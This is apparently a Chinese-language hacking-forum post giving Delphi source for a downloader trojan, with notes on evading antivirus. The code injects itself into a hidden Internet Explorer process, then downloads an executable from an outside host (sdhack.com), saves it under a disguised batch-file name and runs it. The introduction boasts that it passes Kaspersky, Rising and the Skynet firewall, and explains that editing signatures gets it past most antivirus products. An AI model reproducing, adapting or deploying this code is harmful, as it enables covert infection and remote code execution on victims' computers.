编译好后测试能过卡巴瑞星,穿天网3.0,但全球有12款杀毒过不了,最后用冰风文件防火墙改下特征码就能过90%的杀毒了。
program IInjectTTheSelf;
{$IMAGEBASE $13140000}
uses Windows;
var
RunRShell:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
filefDown:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;
function GGetIEAAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
procedure DDownlload;
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('urlmon.dll');
@RunRShell:= GetProcAddress(hShell,'ShellExecuteA');
@filefDown:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
filefDown(nil,'http://www.sdhack.com/123.exe','C:\WINDOWS\temp\AUT0EXEC.BAT', 0, nil);
RunRShell(0,'open','C:\WINDOWS\temp\AUT0EXEC.BAT',nil,nil,5);
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
MModule, NewNModule: Pointer;
Extent, BytesWritten, TID: longword;
begin
MModule := Pointer(GetModuleHandle(nil));
Extent := PImageOptionalHeader(Pointer(integer(MModule) + PImageDosHeader(MModule)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
VirtualFreeEx(ProcessHandle, MModule, 0, MEM_RELEASE);
NewNModule := VirtualAllocEx(ProcessHandle, MModule, Extent, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(ProcessHandle, NewNModule, MModule, Extent, BytesWritten);
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, MModule, 0, TID);
end;
procedure RRunIInject(IInjTType:integer);
var
ProcessHandle, PID: longword;
begin
if IInjTType=1 then
begin
winexec(PChar(GGetIEAAppPath),sw_hide);
sleep(1000);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @dDownlload);
CloseHandle(ProcessHandle);
end;
Begin
RRunIInject(1);
end.